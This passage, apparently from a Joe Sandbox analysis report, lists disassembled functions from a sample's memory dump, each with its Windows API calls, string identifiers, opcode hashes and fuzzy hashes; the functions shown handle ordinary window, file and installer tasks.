                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: CRC$ZipFileCRCData
                                                                                                                • API String ID: 3164693477-3255046153
                                                                                                                • Opcode ID: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                                                • Instruction ID: 6ddc117d37461e98a407975368472051323615dc9f506777e19718c44266dbe0
                                                                                                                • Opcode Fuzzy Hash: 052f0ea71f7ca29ef601de8adeb54f974d86adab7fb7bef832aed737f070183d
                                                                                                                • Instruction Fuzzy Hash: C721BE72911508AFD708EB61CD42EFEB778EB51314F10422EF426A31D1EB786B498665
                                                                                                                Function 00484540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ftol
                                                                                                                • String ID: cur$invalid mode
                                                                                                                • API String ID: 495808979-3413740846
                                                                                                                • Opcode ID: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                                                • Instruction ID: 62864d8fd425b32e9b942a475de88a9d3126e450f522763bc0ab3dfddb68d389
                                                                                                                • Opcode Fuzzy Hash: 43d4c854e94dc27f4f33da026b2d7fb4947327369ca340bd0a2fa02f4ca8866f
                                                                                                                • Instruction Fuzzy Hash: BF019672B4131033E511766A6C83FAF368C8FD2759F14092BF740691C3E79A661143EE
                                                                                                                Function 00424064 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424089
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: Enabled$Visible
                                                                                                                • API String ID: 2123048387-1194824832
                                                                                                                • Opcode ID: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                                                • Instruction ID: a06317538c8d1a01a9211c07e988773db040fce767a5f3220770bb9cebb87b49
                                                                                                                • Opcode Fuzzy Hash: bd5ebb2f9195828ef6a364d451bf49165ec3861c4be1c51869e39e453eeeda88
                                                                                                                • Instruction Fuzzy Hash: BB01263610592476D6027B669C02FCF361C9F46358F14040FF91419092EF6E628383EE
                                                                                                                Function 0043074D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430752
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiVerifyPackageA), ref: 00430791
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressLibraryLoadProc
                                                                                                                • String ID: MsiVerifyPackageA
                                                                                                                • API String ID: 2554327035-617025837
                                                                                                                • Opcode ID: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                                                • Instruction ID: 5317c853de453fce0b51c79f0143e77c63761dfe43dab1a235051b81588ab865
                                                                                                                • Opcode Fuzzy Hash: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                                                • Instruction Fuzzy Hash: 6E014936A00340B6DB00B7769C16FDF261C9F81754F00402FF816962C2DB7CDB8286A9
                                                                                                                Function 00450479 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0045047E
                                                                                                                  • Part of subcall function 0044EB4E: __EH_prolog.LIBCMT ref: 0044EB53
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Checked$Variable
                                                                                                                • API String ID: 2206737547-4072040582
                                                                                                                • Opcode ID: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                                                • Instruction ID: b557a114fa5ee7a457287e9b34bc29c61c141e3a3655fe4132f242bde0297ff1
                                                                                                                • Opcode Fuzzy Hash: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                                                • Instruction Fuzzy Hash: 2D0161356002046ACB19FB63C856AFE7766EFC1318F04856FF512A72C2CF7C6946C659
                                                                                                                Function 0045051B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00450520
                                                                                                                  • Part of subcall function 0044EDBD: __EH_prolog.LIBCMT ref: 0044EDC2
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Checked$Variable
                                                                                                                • API String ID: 2206737547-4072040582
                                                                                                                • Opcode ID: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                                                • Instruction ID: 1f622e6c72d5bdf31cba8138abd98f018be742c2bdca4c4ef77431c36a3b9ab4
                                                                                                                • Opcode Fuzzy Hash: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                                                • Instruction Fuzzy Hash: 13018435640204BFDB20EB52D846FED7B26EB80724F00C51EF516AB2C0C7B9AA41DB98
                                                                                                                Function 00448347 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044835E
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 00448371
                                                                                                                  • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D35
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D41
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D9C
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447DF8
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E04
                                                                                                                  • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$MoveShow
                                                                                                                • String ID: @{D
                                                                                                                • API String ID: 1313642680-849441126
                                                                                                                • Opcode ID: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                                                • Instruction ID: 9b8ab06f5678c24dba60b2739052b10a2f896333f4598c702bdb1458a4d54235
                                                                                                                • Opcode Fuzzy Hash: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                                                • Instruction Fuzzy Hash: F2014F76900518BFDB15EFA9CD45EEEF7B8EF48300F00005EE512A31A0DA74AD01CB54
                                                                                                                Function 00464589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046458E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlockedlstrlen
                                                                                                                • String ID: CustomCtrlInfo$CustomCtrlList
                                                                                                                • API String ID: 2818505249-1052600778
                                                                                                                • Opcode ID: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                                                • Instruction ID: beb598171ee506bd90e5e93b1e4c99edef3199ae416f2fa069e764fcd08a2894
                                                                                                                • Opcode Fuzzy Hash: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                                                • Instruction Fuzzy Hash: B3018176820258AADB08EB91C952FEEB774EF14314F10415FB112A30C1DBF83B44C7A5
                                                                                                                Function 004B0B55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                • GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileLast
                                                                                                                • String ID: -R
                                                                                                                • API String ID: 1799206407-1098841771
                                                                                                                • Opcode ID: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                                                • Instruction ID: 1e009806bf59564d53b0f1126dcaa97511a66ca536c95479395ebd5686f6ada8
                                                                                                                • Opcode Fuzzy Hash: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                                                • Instruction Fuzzy Hash: 1DE0863000824056CA423BB49D4A79F3A516F6132EF514B4FF071891F3CBBC8840973E